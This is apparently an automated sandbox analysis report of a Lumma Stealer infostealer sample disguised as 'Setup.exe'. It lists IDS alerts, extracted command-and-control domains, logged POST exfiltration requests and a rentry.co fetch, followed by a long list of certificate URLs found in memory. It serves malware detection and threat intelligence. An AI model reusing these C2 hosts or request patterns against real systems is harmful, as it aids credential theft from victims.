                    Source: Binary string: c:\buildslave\steam_rel_client_win64\build\src\steam_api\win64\Release\steam_api64.pdb source: Setup.exe, 00000004.00000002.2048428381.00007FFBA9CE7000.00000002.00000001.01000000.0000000B.sdmp, Setup.exe, 00000007.00000002.2085703925.00007FFBA9CE7000.00000002.00000001.01000000.0000000B.sdmp
                    Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdbGCTL source: Setup.exe, 00000004.00000002.2055448652.00007FFBC3145000.00000002.00000001.01000000.00000012.sdmp, Setup.exe, 00000007.00000002.2086516653.00007FFBC3145000.00000002.00000001.01000000.00000012.sdmp
                    Source: Binary string: C:\Develop\dev-Milky\apps\ICQBasic\MIBResources\MIBResources\Eng\_dmt\LiteRes.pdbqsutuuuvwz~ source: powershell.exe, 00000001.00000002.1820039658.00000198BB155000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: Q:\build\qt\qtbase\lib\Qt5Core.pdbT source: Setup.exe, 00000004.00000002.2020848996.00007FFBA223C000.00000002.00000001.01000000.0000000A.sdmp, Setup.exe, 00000007.00000002.2078219554.00007FFBA223C000.00000002.00000001.01000000.0000000A.sdmp

                    Networking

                    barindex
                    Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.8:49717 -> 188.114.97.3:443
                    Source: Network traffic | Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.8:49710 -> 188.114.97.3:443
                    Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.8:49710 -> 188.114.97.3:443
                    Source: Network traffic | Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.8:49715 -> 188.114.97.3:443
                    Source: Network traffic | Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.8:49709 -> 188.114.97.3:443
                    Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.8:49709 -> 188.114.97.3:443
                    Source: Malware configuration extractor | URLs: processhol.sbs
                    Source: Malware configuration extractor | URLs: p3ar11fter.sbs
                    Source: Malware configuration extractor | URLs: peepburry828.sbs
                    Source: Malware configuration extractor | URLs: p10tgrace.sbs
                    Source: Malware configuration extractor | URLs: 3xp3cts1aim.sbs
                    Source: Malware configuration extractor | URLs: 5ptit5tuded.cyou
                    Source: unknown | DNS query: name: rentry.co
                    Source: Joe Sandbox View | IP Address: 188.114.97.3
                    Source: Joe Sandbox View | IP Address: 172.67.75.40
                    Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS
                    Source: Joe Sandbox View | JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                    Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49709 -> 188.114.97.3:443
                    Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49713 -> 188.114.97.3:443
                    Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49717 -> 188.114.97.3:443
                    Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49710 -> 188.114.97.3:443
                    Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49714 -> 188.114.97.3:443
                    Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49718 -> 172.67.75.40:443
                    Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49715 -> 188.114.97.3:443
                    Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49712 -> 188.114.97.3:443
                    Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49716 -> 188.114.97.3:443
                    Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8 | Host: 5ptit5tuded.cyou
                    Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 50 | Host: 5ptit5tuded.cyou
                    Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=15SYDMEWXHQKVCM | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 12831 | Host: 5ptit5tuded.cyou
                    Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=VOHK04ZTITUZBUUF | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 15066 | Host: 5ptit5tuded.cyou
                    Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=INXXJSED9RCD5XIT | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 20233 | Host: 5ptit5tuded.cyou
                    Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=UXYS3DE3NDB | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 1165 | Host: 5ptit5tuded.cyou
                    Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=DS3RNFCGQUM26 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 207903 | Host: 5ptit5tuded.cyou
                    Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 85 | Host: 5ptit5tuded.cyou
                    Source: global traffic | HTTP traffic detected: GET /feouewe5/raw HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Host: rentry.co
                    Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: global traffic | DNS traffic detected: DNS query: 5ptit5tuded.cyou
                    Source: global traffic | DNS traffic detected: DNS query: rentry.co
                    Source: unknown | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8 | Host: 5ptit5tuded.cyou
                    Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Date: Tue, 19 Nov 2024 19:06:41 GMT | Content-Type: text/html; charset=UTF-8 | Content-Length: 8771 | Connection: close | Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA | Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA | Cross-Origin-Embedder-Policy: require-corp | Cross-Origin-Opener-Policy: same-origin | Cross-Origin-Resource-Policy: same-origin | Origin-Agent-Cluster: ?1 | Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=() | Referrer-Policy: same-origin | X-Content-Options: nosniff | X-Frame-Options: SAMEORIGIN | cf-mitigated: challenge
                    Source: powershell.exe, 00000001.00000002.1820039658.00000198BA3FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
                    Source: powershell.exe, 00000001.00000002.1820039658.00000198BACA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1820039658.00000198BAC7E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1820039658.00000198BABC7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1820039658.00000198BAC30000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1820039658.00000198BAE9F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
                    Source: powershell.exe, 00000001.00000002.1820039658.00000198B91F9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
                    Source: Setup.exe, 00000004.00000000.1817611630.00007FF668A85000.00000002.00000001.01000000.00000009.sdmp, Setup.exe, 00000004.00000002.1970234983.00007FF668A85000.00000002.00000001.01000000.00000009.sdmp, Setup.exe, 00000007.00000002.2040700513.00007FF668A85000.00000002.00000001.01000000.00000009.sdmp, Setup.exe, 00000007.00000000.1904136385.00007FF668A85000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: http://dm.origin.com/
                    Source: Setup.exe, 00000004.00000000.1817611630.00007FF668A85000.00000002.00000001.01000000.00000009.sdmp, Setup.exe, 00000004.00000002.1970234983.00007FF668A85000.00000002.00000001.01000000.00000009.sdmp, Setup.exe, 00000007.00000002.2040700513.00007FF668A85000.00000002.00000001.01000000.00000009.sdmp, Setup.exe, 00000007.00000000.1904136385.00007FF668A85000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: http://dm.origin.com/app.httpProxydevUsing
                    Source: powershell.exe, 00000001.00000002.1820039658.00000198B9C2C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1820039658.00000198B9BF7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://electricity.co.ke)
                    Source: powershell.exe, 00000001.00000002.1820039658.00000198BB37B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1820039658.00000198BB3B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1820039658.00000198BB3A0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1820039658.00000198BB3E9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://hi.baidu.com/saqirilatuu/item/9438213716f316ebe7bb7a8d
                    Source: powershell.exe, 00000001.00000002.1820039658.00000198BA3ED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1820039658.00000198BA3FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.certum.pl0
                    Source: powershell.exe, 00000001.00000002.1820039658.00000198BACA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1820039658.00000198BAC7E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1820039658.00000198BABC7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1820039658.00000198BAC30000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1820039658.00000198B9FFA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1820039658.00000198BA3FB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1820039658.00000198BAE9F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                    Source: powershell.exe, 00000001.00000002.1820039658.00000198BABC7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1820039658.00000198BACF6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1820039658.00000198BA3FB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1820039658.00000198B9E84000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2120077314.0000000005550000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                    Source: powershell.exe, 00000001.00000002.1820039658.00000198BACA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1820039658.00000198BAC7E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1820039658.00000198BABC7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1820039658.00000198BACF6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1820039658.00000198BA3FB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1820039658.00000198BAE9F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1820039658.00000198B9E84000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000004.00000002.1939655810.0000029C06AD9000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000007.00000002.2013616968.0000025640252000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000008.00000002.2013261383.0000000004C51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
                    Source: powershell.exe, 00000001.00000002.1820039658.00000198BACA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1820039658.00000198BAC7E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1820039658.00000198BABC7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1820039658.00000198B91F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1820039658.00000198BACF6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1820039658.00000198BA3FB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1820039658.00000198BAE9F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1820039658.00000198B9E84000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000004.00000002.1939655810.0000029C06AD9000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000007.00000002.2013616968.0000025640252000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000008.00000002.2013261383.0000000004C51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
                    Source: Setup.exe, 00000004.00000002.1939655810.0000029C06AD9000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000007.00000002.2013616968.0000025640252000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000008.00000002.2013261383.0000000004C51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0L
                    Source: powershell.exe, 00000001.00000002.1820039658.00000198B91F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1820039658.00000198BACF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0N
                    Source: Setup.exe, 00000004.00000002.1939655810.0000029C06AD9000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000007.00000002.2013616968.0000025640252000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000008.00000002.2013261383.0000000004C51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0O
                    Source: powershell.exe, 00000001.00000002.1820039658.00000198BACA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1820039658.00000198BAC7E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1820039658.00000198BABC7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1820039658.00000198BACF6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1820039658.00000198BA3FB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1820039658.00000198BAE9F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1820039658.00000198B9E84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
                    Source: powershell.exe, 00000001.00000002.1820039658.00000198BB26F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1820039658.00000198BB447000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.globalsign.com/ExtendedSSLSHA256CACross0
                    Source: msiexec.exe, 0000000A.00000003.2120077314.0000000005550000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
                    Source: powershell.exe, 00000001.00000002.1820039658.00000198BA3FB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1820039658.00000198BAE9F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0
                    Source: powershell.exe, 00000001.00000002.1820039658.00000198B9FFA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1820039658.00000198BACF6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1820039658.00000198BA3FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.thawte.com0
                    Source: powershell.exe, 00000001.00000002.1820039658.00000198BB26F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1820039658.00000198BB447000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp2.globalsign.com/gscodesigng20
                    Source: powershell.exe, 00000001.00000002.1820039658.00000198BB26F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1820039658.00000198BB447000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
                    Source: powershell.exe, 00000001.00000002.1820039658.00000198BB26F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1820039658.00000198BB447000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp2.globalsign.com/rootr306
                    Source: powershell.exe, 00000001.00000002.1820039658.00000198B91F9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                    Source: powershell.exe, 00000001.00000002.1820039658.00000198BA3FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://rb.symcb.com/rb.crl0W
                    Source: powershell.exe, 00000001.00000002.1820039658.00000198BA3FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://rb.symcb.com/rb.crt0
                    Source: powershell.exe, 00000001.00000002.1820039658.00000198BA3FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://rb.symcd.com0&
                    Source: powershell.exe, 00000001.00000002.1820039658.00000198BACA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1820039658.00000198BAC7E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1820039658.00000198BABC7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1820039658.00000198B9FFA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1820039658.00000198B91F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1820039658.00000198BA3FB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1820039658.00000198BAE9F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://s.symcb.com/universal-root.crl0
                    Source: powershell.exe, 00000001.00000002.1820039658.00000198BA3FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://s.symcd.com0
                    Source: powershell.exe, 00000001.00000002.1820039658.00000198BACA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1820039658.00000198BAC7E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1820039658.00000198BABC7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1820039658.00000198B9FFA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1820039658.00000198B91F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1820039658.00000198BA3FB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1820039658.00000198BAE9F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://s.symcd.com06
                    Source: Setup.exe, 00000004.00000002.1939655810.0000029C06AD9000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000007.00000002.2013616968.0000025640252000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000008.00000002.2013261383.0000000004C51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
                    Source: Setup.exe, 00000004.00000002.1939655810.0000029C06AD9000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000007.00000002.2013616968.0000025640252000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000008.00000002.2013261383.0000000004C51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://s2.symcb.com0
                    Source: powershell.exe, 00000001.00000002.1820039658.00000198B91F9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                    Source: powershell.exe, 00000001.00000002.1820039658.00000198B8FD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: powershell.exe, 00000001.00000002.1820039658.00000198B91F9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                    Source: powershell.exe, 00000001.00000002.1820039658.00000198BB26F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1820039658.00000198BB447000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/gscodesigng2.crt04
                    Source: powershell.exe, 00000001.00000002.1820039658.00000198BB26F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1820039658.00000198BB447000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
                    Source: powershell.exe, 00000001.00000002.1820039658.00000198BB26F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1820039658.00000198BB447000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingg2.crt0
                    Source: powershell.exe, 00000001.00000002.1820039658.00000198BA3FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://sf.symcb.com/sf.crl0W
                    Source: powershell.exe, 00000001.00000002.1820039658.00000198BA3FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://sf.symcb.com/sf.crt0
                    Source: powershell.exe, 00000001.00000002.1820039658.00000198BA3FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://sf.symcd.com0&
                    Source: Setup.exe, 00000004.00000002.1939655810.0000029C06AD9000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000007.00000002.2013616968.0000025640252000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000008.00000002.2013261383.0000000004C51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://sv.symcb.com/sv.crl0a
                    Source: Setup.exe, 00000004.00000002.1939655810.0000029C06AD9000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000007.00000002.2013616968.0000025640252000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000008.00000002.2013261383.0000000004C51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://sv.symcb.com/sv.crt0
                    Source: Setup.exe, 00000004.00000002.1939655810.0000029C06AD9000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000007.00000002.2013616968.0000025640252000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000008.00000002.2013261383.0000000004C51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://sv.symcd.com0&
                    Source: powershell.exe, 00000001.00000002.1820039658.00000198BA3ED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1820039658.00000198BA3FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://time.certum.pl0
                    Source: powershell.exe, 00000001.00000002.1820039658.00000198BACA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1820039658.00000198BAC7E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1820039658.00000198BABC7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1820039658.00000198B9FFA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1820039658.00000198B91F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1820039658.00000198BA3FB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1820039658.00000198BAE9F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
                    Source: powershell.exe, 00000001.00000002.1820039658.00000198B9FFA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1820039658.00000198BACF6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1820039658.00000198BA3FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
                    Source: powershell.exe, 00000001.00000002.1820039658.00000198BACA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1820039658.00000198BAC7E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1820039658.00000198BABC7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1820039658.00000198B9FFA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1820039658.00000198B91F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1820039658.00000198BA3FB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1820039658.00000198BAE9F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
                    Source: powershell.exe, 00000001.00000002.1820039658.00000198B9FFA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1820039658.00000198BACF6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1820039658.00000198BA3FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
                    Source: powershell.exe, 00000001.00000002.1820039658.00000198B9FFA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1820039658.00000198BACF6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1820039658.00000198BA3FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ts-ocsp.ws.symantec.com07
                    Source: powershell.exe, 00000001.00000002.1820039658.00000198BACA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1820039658.00000198BAC7E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1820039658.00000198BABC7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1820039658.00000198B9FFA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1820039658.00000198B91F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1820039658.00000198BA3FB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1820039658.00000198BAE9F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ts-ocsp.ws.symantec.com0;
